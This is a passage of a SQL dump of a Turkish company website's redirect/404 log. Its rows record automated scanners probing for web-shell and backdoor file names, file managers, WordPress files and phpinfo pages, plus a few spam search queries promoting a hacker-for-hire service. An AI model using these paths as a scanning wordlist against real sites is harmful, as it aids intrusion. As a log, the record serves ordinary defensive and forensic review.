00:00:00',301),(47393,'http://mail.3s-technologies.com.tr/tr/aa18.php',NULL,'','',2,0,'2025-09-24 11:06:58','0000-00-00 00:00:00',301),(47394,'http://mail.3s-technologies.com.tr/tr/img/dot.php',NULL,'','',1,0,'2025-09-24 11:06:59','0000-00-00 00:00:00',301),(47395,'http://mail.3s-technologies.com.tr/tr/ahtrew.php',NULL,'','',1,0,'2025-09-24 11:06:59','0000-00-00 00:00:00',301),(47396,'http://mail.3s-technologies.com.tr/tr/push.php',NULL,'','',1,0,'2025-09-24 11:07:01','0000-00-00 00:00:00',301),(47397,'http://mail.3s-technologies.com.tr/tr/itil.php',NULL,'','',1,0,'2025-09-24 11:07:01','0000-00-00 00:00:00',301),(47398,'http://mail.3s-technologies.com.tr/tr/00.php',NULL,'','',3,0,'2025-09-24 11:07:03','0000-00-00 00:00:00',301),(47399,'http://mail.3s-technologies.com.tr/tr/simp.php',NULL,'','',3,0,'2025-09-24 11:07:03','0000-00-00 00:00:00',301),(47400,'http://mail.3s-technologies.com.tr/tr/broken.php',NULL,'','',1,0,'2025-09-24 11:07:04','0000-00-00 00:00:00',301),(47401,'http://mail.3s-technologies.com.tr/tr/thai.php',NULL,'','',3,0,'2025-09-24 11:07:05','0000-00-00 00:00:00',301),(47402,'http://mail.3s-technologies.com.tr/tr/wag.php',NULL,'','',1,0,'2025-09-24 11:07:06','0000-00-00 00:00:00',301),(47403,'http://mail.3s-technologies.com.tr/tr/tiny.php',NULL,'','',20,0,'2025-09-24 11:07:06','0000-00-00 00:00:00',301),(47404,'http://mail.3s-technologies.com.tr/tr/alpa.php',NULL,'','',15,0,'2025-09-24 11:07:09','0000-00-00 00:00:00',301),(47405,'http://mail.3s-technologies.com.tr/tr/rrr.php',NULL,'','',10,0,'2025-09-24 11:07:09','0000-00-00 00:00:00',301),(47406,'http://mail.3s-technologies.com.tr/tr/keu.php',NULL,'','',5,0,'2025-09-24 11:07:11','0000-00-00 00:00:00',301),(47407,'http://mail.3s-technologies.com.tr/tr/js.php',NULL,'','',13,0,'2025-09-25 00:09:28','0000-00-00 00:00:00',301),(47408,'http://mail.3s-technologies.com.tr/tr/moon.php?p=',NULL,'','',2,0,'2025-09-25 00:09:34','0000-00-00 00:00:00',301),(47409,'http://mail.3s-technologies.com.tr/tr/classwithtostring.php',NULL,'','',107,0,'2025-09-25 00:09:38','0000-00-00 00:00:00',301),(47410,'http://mail.3s-technologies.com.tr/tr/wp-activate.php',NULL,'','',3,0,'2025-09-25 00:09:38','0000-00-00 00:00:00',301),(47411,'http://mail.3s-technologies.com.tr/tr/radio.php',NULL,'','',61,0,'2025-09-25 00:09:40','0000-00-00 00:00:00',301),(47412,'http://mail.3s-technologies.com.tr/tr/0.php',NULL,'','',32,0,'2025-09-25 00:09:44','0000-00-00 00:00:00',301),(47413,'http://mail.3s-technologies.com.tr/tr/ty.php',NULL,'','',30,0,'2025-09-25 00:09:46','0000-00-00 00:00:00',301),(47414,'http://mail.3s-technologies.com.tr/tr/xx.php',NULL,'','',38,0,'2025-09-25 00:09:48','0000-00-00 00:00:00',301),(47415,'http://mail.3s-technologies.com.tr/tr/rss.php',NULL,'','',7,0,'2025-09-25 00:09:49','0000-00-00 00:00:00',301),(47416,'http://mail.3s-technologies.com.tr/tr/mar.php',NULL,'','',22,0,'2025-09-25 00:09:50','0000-00-00 00:00:00',301),(47417,'http://mail.3s-technologies.com.tr/tr/tinny.php',NULL,'','',1,0,'2025-09-25 00:09:51','0000-00-00 00:00:00',301),(47418,'http://mail.3s-technologies.com.tr/tr/warm.php7',NULL,'','',1,0,'2025-09-25 00:09:53','0000-00-00 00:00:00',301),(47419,'http://mail.3s-technologies.com.tr/tr/xmrlpc.php?p=',NULL,'','',2,0,'2025-09-25 00:09:54','0000-00-00 00:00:00',301),(47420,'http://mail.3s-technologies.com.tr/tr/jlex.php',NULL,'','',15,0,'2025-09-25 00:09:55','0000-00-00 00:00:00',301),(47421,'http://mail.3s-technologies.com.tr/tr/mah.php',NULL,'','',34,0,'2025-09-25 00:10:04','0000-00-00 00:00:00',301),(47422,'http://mail.3s-technologies.com.tr/tr/atombil.php',NULL,'','',1,0,'2025-09-25 00:10:06','0000-00-00 00:00:00',301),(47423,'http://mail.3s-technologies.com.tr/tr/shell.php?p=',NULL,'','',1,0,'2025-09-25 00:10:15','0000-00-00 00:00:00',301),(47424,'http://mail.3s-technologies.com.tr/tr/rk2.php',NULL,'','',2,0,'2025-09-25 00:10:16','0000-00-00 00:00:00',301),(47425,'http://mail.3s-technologies.com.tr/tr/classsmtps.php',NULL,'','',4,0,'2025-09-25 00:10:17','0000-00-00 00:00:00',301),(47426,'http://mail.3s-technologies.com.tr/tr/go.php',NULL,'','',7,0,'2025-09-25 00:10:18','0000-00-00 00:00:00',301),(47427,'http://mail.3s-technologies.com.tr/tr/members.php',NULL,'','',1,0,'2025-09-25 00:10:19','0000-00-00 00:00:00',301),(47428,'http://mail.3s-technologies.com.tr/tr/v1.php',NULL,'','',5,0,'2025-09-25 00:10:20','0000-00-00 00:00:00',301),(47429,'http://mail.3s-technologies.com.tr/tr/angelv2.php',NULL,'','',2,0,'2025-09-25 00:10:24','0000-00-00 00:00:00',301),(47430,'http://mail.3s-technologies.com.tr/tr/akcc.php?p=',NULL,'','',1,0,'2025-09-25 00:10:25','0000-00-00 00:00:00',301),(47431,'http://mail.3s-technologies.com.tr/tr/406.php',NULL,'','',1,0,'2025-09-25 00:10:26','0000-00-00 00:00:00',301),(47432,'http://mail.3s-technologies.com.tr/tr/dlu.php',NULL,'','',13,0,'2025-09-25 00:10:29','0000-00-00 00:00:00',301),(47433,'http://mail.3s-technologies.com.tr/tr/jq.php',NULL,'','',7,0,'2025-09-25 00:10:30','0000-00-00 00:00:00',301),(47434,'http://mail.3s-technologies.com.tr/tr/ltsxppjj.php',NULL,'','',1,0,'2025-09-25 00:10:31','0000-00-00 00:00:00',301),(47435,'http://mail.3s-technologies.com.tr/tr/xo.php',NULL,'','',4,0,'2025-09-25 00:10:32','0000-00-00 00:00:00',301),(47436,'http://mail.3s-technologies.com.tr/tr/pnsi.php7',NULL,'','',1,0,'2025-09-25 00:10:34','0000-00-00 00:00:00',301),(47437,'http://mail.3s-technologies.com.tr/tr/mg.php',NULL,'','',1,0,'2025-09-25 00:10:35','0000-00-00 00:00:00',301),(47438,'http://mail.3s-technologies.com.tr/tr/p1u.php',NULL,'','',1,0,'2025-09-25 00:10:39','0000-00-00 00:00:00',301),(47439,'http://mail.3s-technologies.com.tr/tr/asdf.php',NULL,'','',2,0,'2025-09-25 00:10:41','0000-00-00 00:00:00',301),(47440,'http://mail.3s-technologies.com.tr/tr/prod/infos.php',NULL,'','',1,0,'2025-09-25 00:10:42','0000-00-00 00:00:00',301),(47441,'http://3s-technologies.com.tr/tr/tinny.php',NULL,'','',7,0,'2025-09-25 02:27:49','0000-00-00 00:00:00',301),(47442,'http://3s-technologies.com.tr/tr/dlu.php',NULL,'','',28,0,'2025-09-25 02:28:27','0000-00-00 00:00:00',301),(47443,'http://3s-technologies.com.tr/tr/prod/infos.php',NULL,'','',6,0,'2025-09-25 02:28:40','0000-00-00 00:00:00',301),(47444,'https://3s-technologies.com.tr/tr/ipfs/qmnpukxccz5qohwlwdaikgp9vjtrqgtszyyjr7bccwl3yt',NULL,'https://3s-technologies.com.tr/ipfs/QmNPukXccZ5qohWLwdaikGp9vjTrqGtSZYYjR7bCCwL3yt','',2,0,'2025-09-25 18:45:20','0000-00-00 00:00:00',301),(47445,'https://3s-technologies.com.tr/en/catalogsearch/result?q=kiralık+hacker+hacker+bul+-+kiralikhacker.pro',NULL,'','',1,0,'2025-09-25 20:18:37','0000-00-00 00:00:00',301),(47446,'https://3s-technologies.com.tr/en/search?q=kiralık+hacker+hacker+bul+-+kiralikhacker.pro',NULL,'','',1,0,'2025-09-25 20:18:37','0000-00-00 00:00:00',301),(47447,'https://www.3s-technologies.com.tr/tr/ipfs/qmnpukxccz5qohwlwdaikgp9vjtrqgtszyyjr7bccwl3yt',NULL,'https://www.3s-technologies.com.tr/ipfs/QmNPukXccZ5qohWLwdaikGp9vjTrqGtSZYYjR7bCCwL3yt','',3,0,'2025-09-26 02:59:59','0000-00-00 00:00:00',301),(47448,'https://3s-technologies.com.tr/tr/proxy/ipfs/qmnpukxccz5qohwlwdaikgp9vjtrqgtszyyjr7bccwl3yt',NULL,'https://3s-technologies.com.tr/proxy/ipfs/QmNPukXccZ5qohWLwdaikGp9vjTrqGtSZYYjR7bCCwL3yt','',2,0,'2025-09-26 08:49:20','0000-00-00 00:00:00',301),(47449,'http://3s-technologies.com.tr/tr/laravel-filemanager',NULL,'','',4,0,'2025-09-26 11:13:37','0000-00-00 00:00:00',301),(47450,'http://3s-technologies.com.tr/tr/filemanager',NULL,'','',4,0,'2025-09-26 11:13:38','0000-00-00 00:00:00',301),(47451,'https://3s-technologies.com.tr/tr/laravel-filemanager',NULL,'','',4,0,'2025-09-26 11:13:39','0000-00-00 00:00:00',301),(47452,'https://3s-technologies.com.tr/tr/filemanager',NULL,'','',4,0,'2025-09-26 11:13:40','0000-00-00 00:00:00',301),(47453,'http://3s-technologies.com.tr/tr/fffff.php',NULL,'','',24,0,'2025-09-26 16:09:14','0000-00-00 00:00:00',301),(47454,'https://www.3s-technologies.com.tr/tr/proxy/ipfs/qmnpukxccz5qohwlwdaikgp9vjtrqgtszyyjr7bccwl3yt',NULL,'https://www.3s-technologies.com.tr/proxy/ipfs/QmNPukXccZ5qohWLwdaikGp9vjTrqGtSZYYjR7bCCwL3yt','',4,0,'2025-09-26 17:10:59','0000-00-00 00:00:00',301),(47455,'http://mail.3s-technologies.com.tr/tr/granary.php',NULL,'','',1,0,'2025-09-26 18:40:24','0000-00-00 00:00:00',301),(47456,'http://mail.3s-technologies.com.tr/tr/aa21.php',NULL,'','',9,0,'2025-09-26 18:40:25','0000-00-00 00:00:00',301),(47457,'http://mail.3s-technologies.com.tr/tr/fffff.php',NULL,'','',12,0,'2025-09-26 18:40:29','0000-00-00 00:00:00',301),(47458,'http://mail.3s-technologies.com.tr/tr/bitch.php',NULL,'','',1,0,'2025-09-26 18:40:31','0000-00-00 00:00:00',301),(47459,'http://mail.3s-technologies.com.tr/tr/anan.php',NULL,'','',4,0,'2025-09-26 18:40:32','0000-00-00 00:00:00',301),(47460,'http://mail.3s-technologies.com.tr/tr/acacia.php',NULL,'','',1,0,'2025-09-26 18:40:38','0000-00-00 00:00:00',301),(47461,'http://mail.3s-technologies.com.tr/tr/folte.php',NULL,'','',1,0,'2025-09-26 18:40:40','0000-00-00 00:00:00',301),(47462,'http://mail.3s-technologies.com.tr/tr/ssss.php',NULL,'','',12,0,'2025-09-26 18:40:41','0000-00-00 00:00:00',301),(47463,'http://mail.3s-technologies.com.tr/tr/ho.php',NULL,'','',1,0,'2025-09-26 18:40:42','0000-00-00 00:00:00',301),(47464,'http://mail.3s-technologies.com.tr/tr/get.php',NULL,'','',6,0,'2025-09-26 18:40:44','0000-00-00 00:00:00',301),(47465,'http://mail.3s-technologies.com.tr/tr/huangs.php',NULL,'','',3,0,'2025-09-26 18:40:44','0000-00-00 00:00:00',301),(47466,'http://mail.3s-technologies.com.tr/tr/aa2.php',NULL,'','',3,0,'2025-09-26 18:40:47','0000-00-00 00:00:00',301),(47467,'http://mail.3s-technologies.com.tr/tr/samll.php',NULL,'','',8,0,'2025-09-26 18:40:48','0000-00-00 00:00:00',301),(47468,'http://mail.3s-technologies.com.tr/tr/bless5.php',NULL,'','',35,0,'2025-09-26 18:40:53','0000-00-00 00:00:00',301),(47469,'http://mail.3s-technologies.com.tr/tr/fass.php',NULL,'','',3,0,'2025-09-26 18:40:56','0000-00-00 00:00:00',301),(47470,'http://mail.3s-technologies.com.tr/tr/0x0x.php',NULL,'','',15,0,'2025-09-26 18:40:57','0000-00-00 00:00:00',301),(47471,'http://mail.3s-technologies.com.tr/tr/filesss.php',NULL,'','',22,0,'2025-09-26 18:41:07','0000-00-00 00:00:00',301),(47472,'http://mail.3s-technologies.com.tr/tr/444.php',NULL,'','',17,0,'2025-09-26 18:41:36','0000-00-00 00:00:00',301),(47473,'http://mail.3s-technologies.com.tr/tr/vast.php',NULL,'','',5,0,'2025-09-26 18:41:43','0000-00-00 00:00:00',301),(47474,'https://3s-technologies.com.tr/tr/y30hnqwkrgq3gow2obsg',NULL,'https://3s-technologies.com.tr/y30hNQWKRgq3Gow2obsg','',4,0,'2025-09-26 19:44:46','0000-00-00 00:00:00',301),(47475,'http://mail.3s-technologies.com.tr/tr/shoha.php',NULL,'','',16,0,'2025-09-27 09:41:58','0000-00-00 00:00:00',301),(47476,'http://mail.3s-technologies.com.tr/tr/codicil.php',NULL,'','',1,0,'2025-09-27 09:43:29','0000-00-00 00:00:00',301),(47477,'http://mail.3s-technologies.com.tr/tr/gn.php',NULL,'','',1,0,'2025-09-27 09:43:30','0000-00-00 00:00:00',301),(47478,'http://mail.3s-technologies.com.tr/tr/lfm.php',NULL,'','',1,0,'2025-09-27 09:43:31','0000-00-00 00:00:00',301),(47479,'http://mail.3s-technologies.com.tr/tr/ftp.php',NULL,'','',10,0,'2025-09-27 09:43:33','0000-00-00 00:00:00',301),(47480,'http://mail.3s-technologies.com.tr/tr/tgrs.php',NULL,'','',9,0,'2025-09-27 09:43:34','0000-00-00 00:00:00',301),(47481,'http://mail.3s-technologies.com.tr/tr/wek.php',NULL,'','',1,0,'2025-09-27 09:43:35','0000-00-00 00:00:00',301),(47482,'http://mail.3s-technologies.com.tr/tr/auth.php',NULL,'','',14,0,'2025-09-27 09:43:37','0000-00-00 00:00:00',301),(47483,'http://mail.3s-technologies.com.tr/tr/ht.php',NULL,'','',2,0,'2025-09-27 09:43:38','0000-00-00 00:00:00',301),(47484,'http://mail.3s-technologies.com.tr/tr/st.php',NULL,'','',4,0,'2025-09-27 09:43:38','0000-00-00 00:00:00',301),(47485,'http://mail.3s-technologies.com.tr/tr/gi.php',NULL,'','',7,0,'2025-09-27 09:43:41','0000-00-00 00:00:00',301),(47486,'http://mail.3s-technologies.com.tr/tr/mds.php',NULL,'','',18,0,'2025-09-27 09:43:41','0000-00-00 00:00:00',301),(47487,'http://mail.3s-technologies.com.tr/tr/zt2.php',NULL,'','',2,0,'2025-09-27 09:43:42','0000-00-00 00:00:00',301),(47488,'http://mail.3s-technologies.com.tr/tr/zzz.php',NULL,'','',1,0,'2025-09-27 09:43:43','0000-00-00 00:00:00',301),(47489,'http://mail.3s-technologies.com.tr/tr/nij.php',NULL,'','',7,0,'2025-09-27 09:43:44','0000-00-00 00:00:00',301),(47490,'http://mail.3s-technologies.com.tr/tr/uploxe.php',NULL,'','',3,0,'2025-09-27 09:43:46','0000-00-00 00:00:00',301),(47491,'http://mail.3s-technologies.com.tr/tr/wp-load.php',NULL,'','',28,0,'2025-09-27 09:43:47','0000-00-00 00:00:00',301),(47492,'http://mail.3s-technologies.com.tr/tr/ropyx.php',NULL,'','',2,0,'2025-09-27 09:43:47','0000-00-00 00:00:00',301),(47493,'http://mail.3s-technologies.com.tr/tr/class-config.php',NULL,'','',1,0,'2025-09-27 09:43:48','0000-00-00 00:00:00',301),(47494,'http://mail.3s-technologies.com.tr/tr/fwe.php',NULL,'','',18,0,'2025-09-27 09:43:49','0000-00-00 00:00:00',301),(47495,'http://mail.3s-technologies.com.tr/tr/cs.php',NULL,'','',12,0,'2025-09-27 09:43:51','0000-00-00 00:00:00',301),(47496,'http://mail.3s-technologies.com.tr/tr/wo.php',NULL,'','',9,0,'2025-09-27 09:43:53','0000-00-00 00:00:00',301),(47497,'http://mail.3s-technologies.com.tr/tr/v4.php',NULL,'','',21,0,'2025-09-27 09:43:54','0000-00-00 00:00:00',301),(47498,'http://mail.3s-technologies.com.tr/tr/test2.php',NULL,'','',6,0,'2025-09-27 09:43:55','0000-00-00 00:00:00',301),(47499,'http://mail.3s-technologies.com.tr/tr/jf1d22.php',NULL,'','',3,0,'2025-09-27 09:43:55','0000-00-00 00:00:00',301),(47500,'http://mail.3s-technologies.com.tr/tr/hn.php',NULL,'','',3,0,'2025-09-27 09:43:57','0000-00-00 00:00:00',301),(47501,'http://mail.3s-technologies.com.tr/tr/nl.php',NULL,'','',3,0,'2025-09-27 09:43:57','0000-00-00 00:00:00',301),(47502,'http://mail.3s-technologies.com.tr/tr/er8.php',NULL,'','',3,0,'2025-09-27 09:43:58','0000-00-00 00:00:00',301),(47503,'http://mail.3s-technologies.com.tr/tr/zc-903.php',NULL,'','',8,0,'2025-09-27 09:43:59','0000-00-00 00:00:00',301),(47504,'http://mail.3s-technologies.com.tr/tr/bb2.php',NULL,'','',3,0,'2025-09-27 09:44:00','0000-00-00 00:00:00',301),(47505,'http://mail.3s-technologies.com.tr/tr/aipoyp.php',NULL,'','',3,0,'2025-09-27 09:44:02','0000-00-00 00:00:00',301),(47506,'http://mail.3s-technologies.com.tr/tr/flower.php',NULL,'','',40,0,'2025-09-27 09:44:03','0000-00-00 00:00:00',301),(47507,'http://mail.3s-technologies.com.tr/tr/naxc.php',NULL,'','',7,0,'2025-09-27 09:44:05','0000-00-00 00:00:00',301),(47508,'http://mail.3s-technologies.com.tr/tr/555.php',NULL,'','',18,0,'2025-09-27 09:44:05','0000-00-00 00:00:00',301),(47509,'http://mail.3s-technologies.com.tr/tr/fmk.php',NULL,'','',3,0,'2025-09-27 09:44:07','0000-00-00 00:00:00',301),(47510,'http://mail.3s-technologies.com.tr/tr/we2.php',NULL,'','',18,0,'2025-09-27 09:44:09','0000-00-00 00:00:00',301),(47511,'http://mail.3s-technologies.com.tr/tr/zhidagen.php',NULL,'','',3,0,'2025-09-27 09:44:11','0000-00-00 00:00:00',301),(47512,'http://mail.3s-technologies.com.tr/tr/000.php',NULL,'','',23,0,'2025-09-27 09:44:12','0000-00-00 00:00:00',301),(47513,'http://mail.3s-technologies.com.tr/tr/okxoby.php',NULL,'','',4,0,'2025-09-27 09:44:14','0000-00-00 00:00:00',301),(47514,'http://mail.3s-technologies.com.tr/tr/class17.php',NULL,'','',3,0,'2025-09-27 09:44:16','0000-00-00 00:00:00',301),(47515,'http://mail.3s-technologies.com.tr/tr/axao.php',NULL,'','',9,0,'2025-09-27 09:44:18','0000-00-00 00:00:00',301),(47516,'http://mail.3s-technologies.com.tr/tr/okxob.php',NULL,'','',15,0,'2025-09-27 09:44:20','0000-00-00 00:00:00',301),(47517,'http://3s-technologies.com.tr/tr/okxoby.php',NULL,'','',4,0,'2025-09-27 15:08:55','0000-00-00 00:00:00',301),(47518,'http://3s-technologies.com.tr/tr/class17.php',NULL,'','',3,0,'2025-09-27 15:08:57','0000-00-00 00:00:00',301),(47519,'http://3s-technologies.com.tr/tr/nc.php',NULL,'','',5,0,'2025-09-27 15:08:59','0000-00-00 00:00:00',301),(47520,'http://3s-technologies.com.tr/tr/axao.php',NULL,'','',14,0,'2025-09-27 15:09:01','0000-00-00 00:00:00',301),(47521,'http://www.3s-technologies.com.tr/tr/assets/responsysimages',NULL,'http://www.3s-technologies.com.tr/assets/responsysimages','',1,0,'2025-09-28 04:51:43','0000-00-00 00:00:00',301),(47522,'http://3s-technologies.com.tr/tr/wpc.php?p=',NULL,'','',1,0,'2025-09-29 01:27:21','0000-00-00 00:00:00',301),(47523,'http://3s-technologies.com.tr/tr/static/images/nopic.png',NULL,'','',1,0,'2025-09-29 13:50:22','0000-00-00 00:00:00',301),(47524,'https://3s-technologies.com.tr/tr/static/images/nopic.png',NULL,'','',1,0,'2025-09-29 15:04:53','0000-00-00 00:00:00',301),(47525,'http://3s-technologies.com.tr/en/file-manager/initialize',NULL,'','',6,0,'2025-09-30 16:38:10','0000-00-00 00:00:00',301),(47526,'http://3s-technologies.com.tr/en/admin/login',NULL,'','',1,0,'2025-09-30 16:38:18','0000-00-00 00:00:00',301),(47527,'http://3s-technologies.com.tr/tr/wpc.php',NULL,'','',26,0,'2025-10-01 10:42:14','0000-00-00 00:00:00',301),(47528,'http://3s-technologies.com.tr/tr/fileas.php',NULL,'','',21,0,'2025-10-01 10:42:49','0000-00-00 00:00:00',301),(47529,'http://3s-technologies.com.tr/tr/yellow.php',NULL,'','',42,0,'2025-10-01 10:42:55','0000-00-00 00:00:00',301),(47530,'http://3s-technologies.com.tr/tr/plss3.php',NULL,'','',63,0,'2025-10-01 10:43:02','0000-00-00 00:00:00',301),(47531,'http://3s-technologies.com.tr/tr/ddgg.php',NULL,'','',6,0,'2025-10-01 10:43:04','0000-00-00 00:00:00',301),(47532,'http://3s-technologies.com.tr/tr/aves.php',NULL,'','',21,0,'2025-10-01 10:43:05','0000-00-00 00:00:00',301),(47533,'http://3s-technologies.com.tr/tr/mb.php',NULL,'','',1,0,'2025-10-01 10:43:05','0000-00-00 00:00:00',301),(47534,'http://3s-technologies.com.tr/tr/alma.php',NULL,'','',1,0,'2025-10-01 10:43:06','0000-00-00 00:00:00',301),(47535,'http://3s-technologies.com.tr/tr/sluig.php',NULL,'','',1,0,'2025-10-01 10:43:07','0000-00-00 00:00:00',301),(47536,'http://3s-technologies.com.tr/tr/sjcawlic.php',NULL,'','',1,0,'2025-10-01 10:43:08','0000-00-00 00:00:00',301),(47537,'http://3s-technologies.com.tr/tr/bdr.php',NULL,'','',1,0,'2025-10-01 10:43:10','0000-00-00 00:00:00',301),(47538,'http://3s-technologies.com.tr/tr/azra.php',NULL,'','',1,0,'2025-10-01 10:43:11','0000-00-00 00:00:00',301),(47539,'http://3s-technologies.com.tr/tr/llj.php',NULL,'','',1,0,'2025-10-01 10:43:11','0000-00-00 00:00:00',301),(47540,'http://3s-technologies.com.tr/tr/gaga.php',NULL,'','',1,0,'2025-10-01 10:43:12','0000-00-00 00:00:00',301),(47541,'http://3s-technologies.com.tr/en/test/phpinfo',NULL,'http://3s-technologies.com.tr/test/phpinfo','',1,0,'2025-10-01 19:24:17','0000-00-00 00:00:00',301),(47542,'http://3s-technologies.com.tr/en/test/_profiler/phpinfo',NULL,'http://3s-technologies.com.tr/test/_profiler/phpinfo','',1,0,'2025-10-01 19:24:18','0000-00-00 00:00:00',301),(47543,'http://3s-technologies.com.tr/en/info.html',NULL,'http://3s-technologies.com.tr/info.html','',1,0,'2025-10-01 19:24:20','0000-00-00 00:00:00',301),(47544,'http://3s-technologies.com.tr/en/phpinfo.html',NULL,'http://3s-technologies.com.tr/phpinfo.html','',1,0,'2025-10-01 19:24:21','0000-00-00 00:00:00',301),(47545,'http://3s-technologies.com.tr/en/test.html',NULL,'http://3s-technologies.com.tr/test.html','',1,0,'2025-10-01 19:24:23','0000-00-00 00:00:00',301),(47546,'http://3s-technologies.com.tr/en/_phpinfo.php',NULL,'http://3s-technologies.com.tr/_phpinfo.php','',1,0,'2025-10-01 19:24:24','0000-00-00 00:00:00',301),(47547,'http://3s-technologies.com.tr/en/php_info.php',NULL,'http://3s-technologies.com.tr/php_info.php','',1,0,'2025-10-01 19:24:29','0000-00-00 00:00:00',301),(47548,'http://3s-technologies.com.tr/en/api/phpinfo.php',NULL,'http://3s-technologies.com.tr/api/phpinfo.php','',2,0,'2025-10-01 19:24:32','0000-00-00 00:00:00',301),(47549,'http://3s-technologies.com.tr/en/test/phpinfo.php',NULL,'http://3s-technologies.com.tr/test/phpinfo.php','',2,0,'2025-10-01 19:24:33','0000-00-00 00:00:00',301),(47550,'http://3s-technologies.com.tr/en/_profiler/phpinfo.php',NULL,'http://3s-technologies.com.tr/_profiler/phpinfo.php','',1,0,'2025-10-01 19:24:35','0000-00-00 00:00:00',301),(47551,'http://3s-technologies.com.tr/en/profiler/info.php',NULL,'http://3s-technologies.com.tr/profiler/info.php','',1,0,'2025-10-01 19:24:37','0000-00-00 00:00:00',301),(47552,'http://3s-technologies.com.tr/en/phpinfo/test.php',NULL,'http://3s-technologies.com.tr/phpinfo/test.php','',1,0,'2025-10-01 19:24:38','0000-00-00 00:00:00',301),(47553,'https://3s-technologies.com.tr/tr/contact-us',NULL,'https://3s-technologies.com.tr/tr/contact-us','',1,0,'2025-10-02 00:33:43','0000-00-00 00:00:00',301),(47554,'https://3s-technologies.com.tr/en/sites/all/libraries/elfinder/elfinder.html',NULL,'','',1,0,'2025-10-02 14:11:57','0000-00-00 00:00:00',301),(47555,'http://www.3s-technologies.com.tr/en/files.php',NULL,'www.google.com','',1,0,'2025-10-04 07:02:09','0000-00-00 00:00:00',301),(47556,'https://www.3s-technologies.com.tr/en/files.php',NULL,'www.google.com','',1,0,'2025-10-04 07:02:11','0000-00-00 00:00:00',301),(47557,'https://3s-technologies.com.tr/tr/geju.php',NULL,'','',1,0,'2025-10-04 09:21:39','0000-00-00 00:00:00',301),(47558,'http://mail.3s-technologies.com.tr/en/files.php',NULL,'www.google.com','',2,0,'2025-10-04 09:55:45','0000-00-00 00:00:00',301),(47559,'https://mail.3s-technologies.com.tr/en/files.php',NULL,'www.google.com','',1,0,'2025-10-04 09:55:46','0000-00-00 00:00:00',301),(47560,'http://www.3s-technologies.com.tr/tr/wp-admin/css/colors/blue/blue.php',NULL,'','',1,0,'2025-10-04 21:37:16','0000-00-00 00:00:00',301),(47561,'http://www.3s-technologies.com.tr/tr/wxo.php',NULL,'','',1,0,'2025-10-04 21:37:24','0000-00-00 00:00:00',301),(47562,'http://www.3s-technologies.com.tr/tr/amigo.php',NULL,'','',1,0,'2025-10-04 21:37:26','0000-00-00 00:00:00',301),(47563,'http://www.3s-technologies.com.tr/tr/yoi.php',NULL,'','',1,0,'2025-10-04 21:37:28','0000-00-00 00:00:00',301),(47564,'http://www.3s-technologies.com.tr/tr/wp-admin/codeboy1877_up.php',NULL,'','',1,0,'2025-10-04 21:37:30','0000-00-00 00:00:00',301),(47565,'http://www.3s-technologies.com.tr/tr/wp-includes/codeboy1877_up.php',NULL,'','',1,0,'2025-10-04 21:37:32','0000-00-00 00:00:00',301),(47566,'http://www.3s-technologies.com.tr/tr/wp-contentt.php',NULL,'','',1,0,'2025-10-04 21:37:33','0000-00-00 00:00:00',301),(47567,'http://www.3s-technologies.com.tr/tr/i3wfj.php',NULL,'','',1,0,'2025-10-04 21:37:35','0000-00-00 00:00:00',301),(47568,'http://www.3s-technologies.com.tr/tr/s46v1.php',NULL,'','',1,0,'2025-10-04 21:37:38','0000-00-00 00:00:00',301),(47569,'http://www.3s-technologies.com.tr/tr/djfksr4.php',NULL,'','',1,0,'2025-10-04 21:37:41','0000-00-00 00:00:00',301),(47570,'http://www.3s-technologies.com.tr/tr/p7m94.php',NULL,'','',1,0,'2025-10-04 21:37:43','0000-00-00 00:00:00',301),(47571,'http://www.3s-technologies.com.tr/tr/we1y8.php',NULL,'','',1,0,'2025-10-04 21:37:45','0000-00-00 00:00:00',301),(47572,'http://www.3s-technologies.com.tr/tr/jdimzmtaas.php',NULL,'','',1,0,'2025-10-04 21:37:46','0000-00-00 00:00:00',301),(47573,'http://www.3s-technologies.com.tr/tr/wp-content/iu.php',NULL,'','',1,0,'2025-10-04 21:37:48','0000-00-00 00:00:00',301),(47574,'http://www.3s-technologies.com.tr/tr/ccx/th3_err0r.php',NULL,'','',1,0,'2025-10-04 21:37:51','0000-00-00 00:00:00',301),(47575,'http://www.3s-technologies.com.tr/tr/ccx/index.php',NULL,'','',1,0,'2025-10-04 21:37:55','0000-00-00 00:00:00',301),(47576,'http://www.3s-technologies.com.tr/tr/cgi-bin/ffaa531.php',NULL,'','',1,0,'2025-10-04 21:37:56','0000-00-00 00:00:00',301),(47577,'http://www.3s-technologies.com.tr/tr/cgi-bin/991176.php',NULL,'','',1,0,'2025-10-04 21:37:59','0000-00-00 00:00:00',301),(47578,'http://www.3s-technologies.com.tr/tr/991176.php',NULL,'','',1,0,'2025-10-04 21:38:01','0000-00-00 00:00:00',301),(47579,'http://www.3s-technologies.com.tr/tr/wp-content/codeboy1877_up.php',NULL,'','',1,0,'2025-10-04 21:38:02','0000-00-00 00:00:00',301),(47580,'http://www.3s-technologies.com.tr/tr/hehe.php',NULL,'','',3,0,'2025-10-04 21:38:04','0000-00-00 00:00:00',301),(47581,'http://www.3s-technologies.com.tr/tr/post-data.php',NULL,'','',1,0,'2025-10-04 21:38:06','0000-00-00 00:00:00',301),(47582,'http://www.3s-technologies.com.tr/tr/w0.php',NULL,'','',1,0,'2025-10-04 21:38:07','0000-00-00 00:00:00',301),(47583,'http://www.3s-technologies.com.tr/tr/old-index.php',NULL,'','',2,0,'2025-10-04 21:38:10','0000-00-00 00:00:00',301),(47584,'http://www.3s-technologies.com.tr/tr/wsanon.php',NULL,'','',1,0,'2025-10-04 21:38:12','0000-00-00 00:00:00',301),(47585,'http://www.3s-technologies.com.tr/tr/wp-content/small.php',NULL,'','',1,0,'2025-10-04 21:38:15','0000-00-00 00:00:00',301),(47586,'http://www.3s-technologies.com.tr/tr/wp-content/mode.php',NULL,'','',1,0,'2025-10-04 21:38:16','0000-00-00 00:00:00',301),(47587,'http://www.3s-technologies.com.tr/tr/indo.php',NULL,'','',4,0,'2025-10-04 21:38:21','0000-00-00 00:00:00',301),(47588,'http://www.3s-technologies.com.tr/tr/beence.php',NULL,'','',1,0,'2025-10-04 21:38:22','0000-00-00 00:00:00',301),(47589,'http://www.3s-technologies.com.tr/tr/indosec.php',NULL,'','',1,0,'2025-10-04 21:38:25','0000-00-00 00:00:00',301),(47590,'http://www.3s-technologies.com.tr/tr/archives.php',NULL,'','',1,0,'2025-10-04 21:38:27','0000-00-00 00:00:00',301),(47591,'http://www.3s-technologies.com.tr/tr/po8sa.php',NULL,'','',1,0,'2025-10-04 21:38:28','0000-00-00 00:00:00',301),(47592,'http://www.3s-technologies.com.tr/tr/thesmartestx.php',NULL,'','',1,0,'2025-10-04 21:38:30','0000-00-00 